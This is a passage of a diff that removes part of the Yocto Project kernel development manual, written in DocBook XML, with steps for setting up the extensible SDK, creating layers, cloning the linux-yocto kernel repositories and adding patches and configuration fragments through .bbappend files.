-                            common and BSP layers, see the
-                            "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-                            section in the Yocto Project Development Tasks
-                            Manual and the
-                            "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP Layers</ulink>"
-                            section in the Yocto Project Board Support (BSP)
-                            Developer's Guide, respectively.
-                            For information on how to use the
-                            <filename>bitbake-layers create-layer</filename>
-                            command to quickly set up a layer, see the
-                            "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
-                            section in the Yocto Project Development Tasks
-                            Manual.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Inform the BitBake Build Environment About
-                        Your Layer:</emphasis>
-                        As directed when you created your layer, you need to
-                        add the layer to the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'><filename>BBLAYERS</filename></ulink>
-                        variable in the <filename>bblayers.conf</filename> file
-                        as follows:
-                        <literallayout class='monospaced'>
-     $ cd ~/poky/build
-     $ bitbake-layers add-layer ../../meta-mylayer
-     NOTE: Starting bitbake server...
-     $
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build the Extensible SDK:</emphasis>
-                        Use BitBake to build the extensible SDK specifically
-                        for use with images to be run using QEMU:
-                        <literallayout class='monospaced'>
-     $ cd ~/poky/build
-     $ bitbake core-image-minimal -c populate_sdk_ext
-                        </literallayout>
-                        Once the build finishes, you can find the SDK installer
-                        file (i.e. <filename>*.sh</filename> file) in the
-                        following directory:
-                        <literallayout class='monospaced'>
-     ~/poky/build/tmp/deploy/sdk
-                        </literallayout>
-                        For this example, the installer file is named
-                        <filename>poky-glibc-x86_64-core-image-minimal-i586-toolchain-ext-&DISTRO;.sh</filename>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Install the Extensible SDK:</emphasis>
-                        Use the following command to install the SDK.
-                        For this example, install the SDK in the default
-                        <filename>~/poky_sdk</filename> directory:
-                        <literallayout class='monospaced'>
-     $ cd ~/poky/build/tmp/deploy/sdk
-     $ ./poky-glibc-x86_64-core-image-minimal-i586-toolchain-ext-&DISTRO;.sh
-     Poky (Yocto Project Reference Distro) Extensible SDK installer version &DISTRO;
-     ============================================================================
-     Enter target directory for SDK (default: ~/poky_sdk):
-     You are about to install the SDK to "/home/scottrif/poky_sdk". Proceed [Y/n]? Y
-     Extracting SDK......................................done
-     Setting it up...
-     Extracting buildtools...
-     Preparing build system...
-     Parsing recipes: 100% |#################################################################| Time: 0:00:52
-     Initializing tasks: 100% |############## ###############################################| Time: 0:00:04
-     Checking sstate mirror object availability: 100% |######################################| Time: 0:00:00
-     Parsing recipes: 100% |#################################################################| Time: 0:00:33
-     Initializing tasks: 100% |##############################################################| Time: 0:00:00
-     done
-     SDK has been successfully set up and is ready to be used.
-     Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
-      $ . /home/scottrif/poky_sdk/environment-setup-i586-poky-linux
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para id='setting-up-the-esdk-terminal'>
-                        <emphasis>Set Up a New Terminal to Work With the
-                        Extensible SDK:</emphasis>
-                        You must set up a new terminal to work with the SDK.
-                        You cannot use the same BitBake shell used to build the
-                        installer.</para>
-
-                        <para>After opening a new shell, run the SDK environment
-                        setup script as directed by the output from installing
-                        the SDK:
-                        <literallayout class='monospaced'>
-     $ source ~/poky_sdk/environment-setup-i586-poky-linux
-     "SDK environment now set up; additionally you may now run devtool to perform development tasks.
-     Run devtool --help for further details.
-                        </literallayout>
-                        <note>
-                            If you get a warning about attempting to use the
-                            extensible SDK in an environment set up to run
-                            BitBake, you did not use a new shell.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build the Clean Image:</emphasis>
-                        The final step in preparing to work on the kernel is to
-                        build an initial image using
-                        <filename>devtool</filename> in the new terminal you
-                        just set up and initialized for SDK work:
-                        <literallayout class='monospaced'>
-     $ devtool build-image
-     Parsing recipes: 100% |##########################################| Time: 0:00:05
-     Parsing of 830 .bb files complete (0 cached, 830 parsed). 1299 targets, 47 skipped, 0 masked, 0 errors.
-     WARNING: No packages to add, building image core-image-minimal unmodified
-     Loading cache: 100% |############################################| Time: 0:00:00
-     Loaded 1299 entries from dependency cache.
-     NOTE: Resolving any missing task queue dependencies
-     Initializing tasks: 100% |#######################################| Time: 0:00:07
-     Checking sstate mirror object availability: 100% |###############| Time: 0:00:00
-     NOTE: Executing SetScene Tasks
-     NOTE: Executing RunQueue Tasks
-     NOTE: Tasks Summary: Attempted 2866 tasks of which 2604 didn't need to be rerun and all succeeded.
-     NOTE: Successfully built core-image-minimal. You can find output files in /home/scottrif/poky_sdk/tmp/deploy/images/qemux86
-                        </literallayout>
-                        If you were building for actual hardware and not for
-                        emulation, you could flash the image to a USB stick
-                        on <filename>/dev/sdd</filename> and boot your device.
-                        For an example that uses a Minnowboard, see the
-                        <ulink url='https://wiki.yoctoproject.org/wiki/TipsAndTricks/KernelDevelopmentWithEsdk'>TipsAndTricks/KernelDevelopmentWithEsdk</ulink>
-                        Wiki page.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-
-            <para>
-                At this point you have set up to start making modifications to
-                the kernel by using the extensible SDK.
-                For a continued example, see the
-                "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
-                section.
-            </para>
-        </section>
-
-        <section id='getting-ready-for-traditional-kernel-development'>
-            <title>Getting Ready for Traditional Kernel Development</title>
-
-            <para>
-                Getting ready for traditional kernel development using the Yocto
-                Project involves many of the same steps as described in the
-                previous section.
-                However, you need to establish a local copy of the kernel source
-                since you will be editing these files.
-            </para>
-
-            <para>
-                Follow these steps to prepare to update the kernel image using
-                traditional kernel development flow with the Yocto Project.
-                Completing this procedure leaves you ready to make modifications
-                to the kernel source as described in the
-                "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
-                section:
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Initialize the BitBake Environment:</emphasis>
-                        Before you can do anything using BitBake, you need to
-                        initialize the BitBake build environment by sourcing the
-                        build environment script
-                        (i.e. <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>oe-init-build-env</filename></ulink>).
-                        Also, for this example, be sure that the local branch
-                        you have checked out for <filename>poky</filename> is
-                        the Yocto Project &DISTRO_NAME; branch.
-                        If you need to checkout out the &DISTRO_NAME; branch,
-                        see the
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#checking-out-by-branch-in-poky'>Checking out by Branch in Poky</ulink>"
-                        section in the Yocto Project Development Tasks Manual.
-                        <literallayout class='monospaced'>
-     $ cd ~/poky
-     $ git branch
-     master
-     * &DISTRO_NAME;
-     $ source oe-init-build-env
-                        </literallayout>
-                        <note>
-                            The previous commands assume the
-                            <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
-                            (i.e. <filename>poky</filename>) have been cloned
-                            using Git and the local repository is named
-                            "poky".
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Prepare Your <filename>local.conf</filename>
-                        File:</emphasis>
-                        By default, the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                        variable is set to "qemux86-64", which is fine if you are
-                        building for the QEMU emulator in 64-bit mode.
-                        However, if you are not, you need to set the
-                        <filename>MACHINE</filename> variable appropriately in
-                        your <filename>conf/local.conf</filename> file found
-                        in the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                        (i.e. <filename>~/poky/build</filename> in this
-                        example).</para>
-
-                        <para>Also, since you are preparing to work on the
-                        kernel image, you need to set the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</filename></ulink>
-                        variable to include kernel modules.</para>
-
-                        <para>In this example we wish to build for qemux86 so
-                        we must set the <filename>MACHINE</filename> variable
-                        to "qemux86" and also add the "kernel-modules". As described
-                        we do this by appending to <filename>conf/local.conf</filename>:
-                        <literallayout class='monospaced'>
-     MACHINE = "qemux86"
-     MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-modules"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Create a Layer for Patches:</emphasis>
-                        You need to create a layer to hold patches created
-                        for the kernel image.
-                        You can use the
-                        <filename>bitbake-layers create-layer</filename>
-                        command as follows:
-                        <literallayout class='monospaced'>
-     $ cd ~/poky/build
-     $ bitbake-layers create-layer ../../meta-mylayer
-     NOTE: Starting bitbake server...
-     Add your new layer with 'bitbake-layers add-layer ../../meta-mylayer'
-                        </literallayout>
-                        <note>
-                            For background information on working with
-                            common and BSP layers, see the
-                            "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-                            section in the Yocto Project Development Tasks
-                            Manual and the
-                            "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP Layers</ulink>"
-                            section in the Yocto Project Board Support (BSP)
-                            Developer's Guide, respectively.
-                            For information on how to use the
-                            <filename>bitbake-layers create-layer</filename>
-                            command to quickly set up a layer, see the
-                            "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
-                            section in the Yocto Project Development Tasks
-                            Manual.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Inform the BitBake Build Environment About
-                        Your Layer:</emphasis>
-                        As directed when you created your layer, you need to add
-                        the layer to the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'><filename>BBLAYERS</filename></ulink>
-                        variable in the <filename>bblayers.conf</filename> file
-                        as follows:
-                        <literallayout class='monospaced'>
-     $ cd ~/poky/build
-     $ bitbake-layers add-layer ../../meta-mylayer
-     NOTE: Starting bitbake server ...
-     $
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Create a Local Copy of the Kernel Git
-                        Repository:</emphasis>
-                        You can find Git repositories of supported Yocto Project
-                        kernels organized under "Yocto Linux Kernel" in the
-                        Yocto Project Source Repositories at
-                        <ulink url='&YOCTO_GIT_URL;'></ulink>.
-                        </para>
-
-                        <para>
-                        For simplicity, it is recommended that you create your
-                        copy of the kernel Git repository outside of the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>,
-                        which is usually named <filename>poky</filename>.
-                        Also, be sure you are in the
-                        <filename>standard/base</filename> branch.
-                        </para>
-
-                        <para>
-                        The following commands show how to create a local copy
-                        of the <filename>linux-yocto-4.12</filename> kernel and
-                        be in the <filename>standard/base</filename> branch.
-                        <note>
-                            The <filename>linux-yocto-4.12</filename> kernel
-                            can be used with the Yocto Project 2.4 release
-                            and forward.
-                            You cannot use the
-                            <filename>linux-yocto-4.12</filename> kernel with
-                            releases prior to Yocto Project 2.4:
-                        </note>
-                        <literallayout class='monospaced'>
-     $ cd ~
-     $ git clone git://git.yoctoproject.org/linux-yocto-4.12 --branch standard/base
-     Cloning into 'linux-yocto-4.12'...
-     remote: Counting objects: 6097195, done.
-     remote: Compressing objects: 100% (901026/901026), done.
-     remote: Total 6097195 (delta 5152604), reused 6096847 (delta 5152256)
-     Receiving objects: 100% (6097195/6097195), 1.24 GiB | 7.81 MiB/s, done.
-     Resolving deltas: 100% (5152604/5152604), done.
-     Checking connectivity... done.
-     Checking out files: 100% (59846/59846), done.
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Create a Local Copy of the Kernel Cache Git
-                        Repository:</emphasis>
-                        For simplicity, it is recommended that you create your
-                        copy of the kernel cache Git repository outside of the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>,
-                        which is usually named <filename>poky</filename>.
-                        Also, for this example, be sure you are in the
-                        <filename>yocto-4.12</filename> branch.
-                        </para>
-
-                        <para>
-                        The following commands show how to create a local copy
-                        of the <filename>yocto-kernel-cache</filename> and
-                        be in the <filename>yocto-4.12</filename> branch:
-                        <literallayout class='monospaced'>
-     $ cd ~
-     $ git clone git://git.yoctoproject.org/yocto-kernel-cache --branch yocto-4.12
-     Cloning into 'yocto-kernel-cache'...
-     remote: Counting objects: 22639, done.
-     remote: Compressing objects: 100% (9761/9761), done.
-     remote: Total 22639 (delta 12400), reused 22586 (delta 12347)
-     Receiving objects: 100% (22639/22639), 22.34 MiB | 6.27 MiB/s, done.
-     Resolving deltas: 100% (12400/12400), done.
-     Checking connectivity... done.
-                        </literallayout>
-                        </para></listitem>
-                </orderedlist>
-            </para>
-
-            <para>
-                At this point, you are ready to start making modifications to
-                the kernel using traditional kernel development steps.
-                For a continued example, see the
-                "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
-                section.
-            </para>
-        </section>
-    </section>
-
-    <section id='creating-and-preparing-a-layer'>
-        <title>Creating and Preparing a Layer</title>
-
-        <para>
-            If you are going to be modifying kernel recipes, it is recommended
-            that you create and prepare your own layer in which to do your
-            work.
-            Your layer contains its own
-            <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
-            append files (<filename>.bbappend</filename>) and provides a
-            convenient mechanism to create your own recipe files
-            (<filename>.bb</filename>) as well as store and use kernel
-            patch files.
-            For background information on working with layers, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-            <note><title>Tip</title>
-                The Yocto Project comes with many tools that simplify
-                tasks you need to perform.
-                One such tool is the
-                <filename>bitbake-layers create-layer</filename>
-                command, which simplifies creating a new layer.
-                See the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
-                section in the Yocto Project Development Tasks Manual for
-                information on how to use this script to quick set up a
-                new layer.
-            </note>
-        </para>
-
-        <para>
-            To better understand the layer you create for kernel development,
-            the following section describes how to create a layer
-            without the aid of tools.
-            These steps assume creation of a layer named
-            <filename>mylayer</filename> in your home directory:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Create Structure</emphasis>:
-                    Create the layer's structure:
-                    <literallayout class='monospaced'>
-     $ cd $HOME
-     $ mkdir meta-mylayer
-     $ mkdir meta-mylayer/conf
-     $ mkdir meta-mylayer/recipes-kernel
-     $ mkdir meta-mylayer/recipes-kernel/linux
-     $ mkdir meta-mylayer/recipes-kernel/linux/linux-yocto
-                    </literallayout>
-                    The <filename>conf</filename> directory holds your
-                    configuration files, while the
-                    <filename>recipes-kernel</filename> directory holds your
-                    append file and eventual patch files.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Create the Layer Configuration File</emphasis>:
-                    Move to the <filename>meta-mylayer/conf</filename>
-                    directory and create the <filename>layer.conf</filename>
-                    file as follows:
-                    <literallayout class='monospaced'>
-     # We have a conf and classes directory, add to BBPATH
-     BBPATH .= ":${LAYERDIR}"
-
-     # We have recipes-* directories, add to BBFILES
-     BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
-                 ${LAYERDIR}/recipes-*/*/*.bbappend"
-
-     BBFILE_COLLECTIONS += "mylayer"
-     BBFILE_PATTERN_mylayer = "^${LAYERDIR}/"
-     BBFILE_PRIORITY_mylayer = "5"
-                    </literallayout>
-                    Notice <filename>mylayer</filename> as part of the last
-                    three statements.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Create the Kernel Recipe Append File</emphasis>:
-                    Move to the
-                    <filename>meta-mylayer/recipes-kernel/linux</filename>
-                    directory and create the kernel's append file.
-                    This example uses the
-                    <filename>linux-yocto-4.12</filename> kernel.
-                    Thus, the name of the append file is
-                    <filename>linux-yocto_4.12.bbappend</filename>:
-                    <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
-
-     SRC_URI_append = " file://<replaceable>patch-file-one</replaceable>"
-     SRC_URI_append = " file://<replaceable>patch-file-two</replaceable>"
-     SRC_URI_append = " file://<replaceable>patch-file-three</replaceable>"
-                    </literallayout>
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                    statements enable the OpenEmbedded build system to find
-                    patch files.
-                    For more information on using append files, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files in Your Layer</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='modifying-an-existing-recipe'>
-        <title>Modifying an Existing Recipe</title>
-
-        <para>
-            In many cases, you can customize an existing linux-yocto recipe to
-            meet the needs of your project.
-            Each release of the Yocto Project provides a few Linux
-            kernel recipes from which you can choose.
-            These are located in the
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-            in <filename>meta/recipes-kernel/linux</filename>.
-        </para>
-
-        <para>
-            Modifying an existing recipe can consist of the following:
-            <itemizedlist>
-                <listitem><para>Creating the append file</para></listitem>
-                <listitem><para>Applying patches</para></listitem>
-                <listitem><para>Changing the configuration</para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            Before modifying an existing recipe, be sure that you have created
-            a minimal, custom layer from which you can work.
-            See the
-            "<link linkend='creating-and-preparing-a-layer'>Creating and Preparing a Layer</link>"
-            section for information.
-        </para>
-
-        <section id='creating-the-append-file'>
-            <title>Creating the Append File</title>
-
-            <para>
-                You create this file in your custom layer.
-                You also name it accordingly based on the linux-yocto recipe
-                you are using.
-                For example, if you are modifying the
-                <filename>meta/recipes-kernel/linux/linux-yocto_4.12.bb</filename>
-                recipe, the append file will typically be located as follows
-                within your custom layer:
-                <literallayout class='monospaced'>
-     <replaceable>your-layer</replaceable>/recipes-kernel/linux/linux-yocto_4.12.bbappend
-                </literallayout>
-                The append file should initially extend the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
-                search path by prepending the directory that contains your
-                files to the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
-                variable as follows:
-                <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
-                </literallayout>
-                The path <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-THISDIR'><filename>THISDIR</filename></ulink><filename>}/${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>
-                expands to "linux-yocto" in the current directory for this
-                example.
-                If you add any new files that modify the kernel recipe and you
-                have extended <filename>FILESPATH</filename> as
-                described above, you must place the files in your layer in the
-                following area:
-                <literallayout class='monospaced'>
-     <replaceable>your-layer</replaceable>/recipes-kernel/linux/linux-yocto/
-                </literallayout>
-                <note>If you are working on a new machine Board Support Package
-                    (BSP), be sure to refer to the
-                    <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
-                </note>
-            </para>
-
-            <para>
-                As an example, consider the following append file
-                used by the BSPs in <filename>meta-yocto-bsp</filename>:
-                <literallayout class='monospaced'>
-     meta-yocto-bsp/recipes-kernel/linux/linux-yocto_4.12.bbappend
-                </literallayout>
-                The following listing shows the file.
-                Be aware that the actual commit ID strings in this
-                example listing might be different than the actual strings
-                in the file from the <filename>meta-yocto-bsp</filename>
-                layer upstream.
-                <literallayout class='monospaced'>
-     KBRANCH_genericx86  = "standard/base"
-     KBRANCH_genericx86-64  = "standard/base"
-
-     KMACHINE_genericx86 ?= "common-pc"
-     KMACHINE_genericx86-64 ?= "common-pc-64"
-     KBRANCH_edgerouter = "standard/edgerouter"
-     KBRANCH_beaglebone = "standard/beaglebone"
-
-     SRCREV_machine_genericx86    ?= "d09f2ce584d60ecb7890550c22a80c48b83c2e19"
-     SRCREV_machine_genericx86-64 ?= "d09f2ce584d60ecb7890550c22a80c48b83c2e19"
-     SRCREV_machine_edgerouter ?= "b5c8cfda2dfe296410d51e131289fb09c69e1e7d"
-     SRCREV_machine_beaglebone ?= "b5c8cfda2dfe296410d51e131289fb09c69e1e7d"
-
-
-     COMPATIBLE_MACHINE_genericx86 = "genericx86"
-     COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
-     COMPATIBLE_MACHINE_edgerouter = "edgerouter"
-     COMPATIBLE_MACHINE_beaglebone = "beaglebone"
-
-     LINUX_VERSION_genericx86 = "4.12.7"
-     LINUX_VERSION_genericx86-64 = "4.12.7"
-     LINUX_VERSION_edgerouter = "4.12.10"
-     LINUX_VERSION_beaglebone = "4.12.10"
-                </literallayout>
-                This append file contains statements used to support
-                several BSPs that ship with the Yocto Project.
-                The file defines machines using the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-COMPATIBLE_MACHINE'><filename>COMPATIBLE_MACHINE</filename></ulink>
-                variable and uses the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>
-                variable to ensure the machine name used by the OpenEmbedded
-                build system maps to the machine name used by the Linux Yocto
-                kernel.
-                The file also uses the optional
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KBRANCH'><filename>KBRANCH</filename></ulink>
-                variable to ensure the build process uses the
-                appropriate kernel branch.
-            </para>
-
-            <para>
-                Although this particular example does not use it, the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_FEATURES'><filename>KERNEL_FEATURES</filename></ulink>
-                variable could be used to enable features specific to
-                the kernel.
-                The append file points to specific commits in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                Git repository and the <filename>meta</filename> Git repository
-                branches to identify the exact kernel needed to build the
-                BSP.
-            </para>
-
-            <para>
-                One thing missing in this particular BSP, which you will
-                typically need when developing a BSP, is the kernel
-                configuration file (<filename>.config</filename>) for your BSP.
-                When developing a BSP, you probably have a kernel configuration
-                file or a set of kernel configuration files that, when taken
-                together, define the kernel configuration for your BSP.
-                You can accomplish this definition by putting the configurations
-                in a file or a set of files inside a directory located at the
-                same level as your kernel's append file and having the same
-                name as the kernel's main recipe file.
-                With all these conditions met, simply reference those files in
-                the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                statement in the append file.
-            </para>
-
-            <para>
-                For example, suppose you had some configuration options
-                in a file called <filename>network_configs.cfg</filename>.
-                You can place that file inside a directory named
-                <filename>linux-yocto</filename> and then add
-                a <filename>SRC_URI</filename> statement such as the
-                following to the append file.
-                When the OpenEmbedded build system builds the kernel, the
-                configuration options are picked up and applied.
-                <literallayout class='monospaced'>
-     SRC_URI += "file://network_configs.cfg"
-                </literallayout>
-            </para>
-
-            <para>
-                To group related configurations into multiple files, you
-                perform a similar procedure.
-                Here is an example that groups separate configurations
-                specifically for Ethernet and graphics into their own
-                files and adds the configurations by using a
-                <filename>SRC_URI</filename> statement like the following
-                in your append file:
-                <literallayout class='monospaced'>
-     SRC_URI += "file://myconfig.cfg \
-                 file://eth.cfg \
-                 file://gfx.cfg"
-                </literallayout>
-            </para>
-
-            <para>
-                Another variable you can use in your kernel recipe append
-                file is the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
-                variable.
-                When you use this statement, you are extending the locations
-                used by the OpenEmbedded system to look for files and
-                patches as the recipe is processed.
-            </para>
-
-            <note>
-                <para>
-                    Other methods exist to accomplish grouping and defining
-                    configuration options.
-                    For example, if you are working with a local clone of the
-                    kernel repository, you could checkout the kernel's
-                    <filename>meta</filename> branch, make your changes, and
-                    then push the changes to the local bare clone of the
-                    kernel.
-                    The result is that you directly add configuration options
-                    to the <filename>meta</filename> branch for your BSP.
-                    The configuration options will likely end up in that
-                    location anyway if the BSP gets added to the Yocto Project.
-                </para>
-
-                <para>
-                    In general, however, the Yocto Project maintainers take
-                    care of moving the <filename>SRC_URI</filename>-specified
-                    configuration options to the kernel's
-                    <filename>meta</filename> branch.
-                    Not only is it easier for BSP developers to not have to
-                    worry about putting those configurations in the branch,
-                    but having the maintainers do it allows them to apply
-                    'global' knowledge about the kinds of common configuration
-                    options multiple BSPs in the tree are typically using.
-                    This allows for promotion of common configurations into
-                    common features.
-                </para>
-            </note>
-        </section>
-
-        <section id='applying-patches'>
-            <title>Applying Patches</title>
-
-            <para>
-                If you have a single patch or a small series of patches
-                that you want to apply to the Linux kernel source, you
-                can do so just as you would with any other recipe.
-                You first copy the patches to the path added to
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
-                in your <filename>.bbappend</filename> file as described in
-                the previous section, and then reference them in
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                statements.
-            </para>
-
-            <para>
-                For example, you can apply a three-patch series by adding the
-                following lines to your linux-yocto
-                <filename>.bbappend</filename> file in your layer:
-                <literallayout class='monospaced'>
-     SRC_URI += "file://0001-first-change.patch"
-     SRC_URI += "file://0002-second-change.patch"
-     SRC_URI += "file://0003-third-change.patch"
-                </literallayout>
-                The next time you run BitBake to build the Linux kernel,
-                BitBake detects the change in the recipe and fetches and
-                applies the patches before building the kernel.
-            </para>
-
-            <para>
-                For a detailed example showing how to patch the kernel using
-                <filename>devtool</filename>, see the
-                "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
-                and
-                "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
-                sections.
-            </para>
-        </section>
-
-        <section id='changing-the-configuration'>
-            <title>Changing the Configuration</title>
-
-            <para>
-                You can make wholesale or incremental changes to the final
-                <filename>.config</filename> file used for the eventual
-                Linux kernel configuration by including a
-                <filename>defconfig</filename> file and by specifying
-                configuration fragments in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                to be applied to that file.
-            </para>
-
-            <para>
-                If you have a complete, working Linux kernel
-                <filename>.config</filename>
-                file you want to use for the configuration, as before, copy
-                that file to the appropriate <filename>${PN}</filename>
-                directory in your layer's
-                <filename>recipes-kernel/linux</filename> directory,
-                and rename the copied file to "defconfig".
-                Then, add the following lines to the linux-yocto
-                <filename>.bbappend</filename> file in your layer:
-                <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
-     SRC_URI += "file://defconfig"
-                </literallayout>
-                The <filename>SRC_URI</filename> tells the build system how to
-                search for the file, while the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
-                extends the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
-                variable (search directories) to include the
-                <filename>${PN}</filename> directory you created to hold the
-                configuration changes.
-            </para>
-
-            <note>
-                The build system applies the configurations from the
-                <filename>defconfig</filename> file before applying any
-                subsequent configuration fragments.
-                The final kernel configuration is a combination of the
-                configurations in the <filename>defconfig</filename> file and
-                any configuration fragments you provide.
-                You need to realize that if you have any configuration
-                fragments, the build system applies these on top of and
-                after applying the existing <filename>defconfig</filename>
-                file configurations.
-            </note>
-
-            <para>
-                Generally speaking, the preferred approach is to determine the
-                incremental change you want to make and add that as a
-                configuration fragment.
-                For example, if you want to add support for a basic serial
-                console, create a file named <filename>8250.cfg</filename> in
-                the <filename>${PN}</filename> directory with the following
-                content (without indentation):
-                <literallayout class='monospaced'>
-     CONFIG_SERIAL_8250=y
-     CONFIG_SERIAL_8250_CONSOLE=y
-     CONFIG_SERIAL_8250_PCI=y
-     CONFIG_SERIAL_8250_NR_UARTS=4
-     CONFIG_SERIAL_8250_RUNTIME_UARTS=4
-     CONFIG_SERIAL_CORE=y
-     CONFIG_SERIAL_CORE_CONSOLE=y
-                </literallayout>
-                Next, include this configuration fragment and extend the
-                <filename>FILESPATH</filename> variable in your
-                <filename>.bbappend</filename> file:
-                <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
-     SRC_URI += "file://8250.cfg"
-                </literallayout>
-                The next time you run BitBake to build the Linux kernel, BitBake
-                detects the change in the recipe and fetches and applies the
-                new configuration before building the kernel.
-            </para>
-
-            <para>
-                For a detailed example showing how to configure the kernel,
-                see the
-                "<link linkend='configuring-the-kernel'>Configuring the Kernel</link>"
-                section.
-            </para>
-        </section>
-
-        <section id='using-an-in-tree-defconfig-file'>
-            <title>Using an "In-Tree"&nbsp;&nbsp;<filename>defconfig</filename> File</title>
-
-            <para>
-                It might be desirable to have kernel configuration fragment
-                support through a <filename>defconfig</filename> file that
-                is pulled from the kernel source tree for the configured
-                machine.
-                By default, the OpenEmbedded build system looks for
-                <filename>defconfig</filename> files in the layer used for
-                Metadata, which is "out-of-tree", and then configures them
-                using the following:
-                <literallayout class='monospaced'>
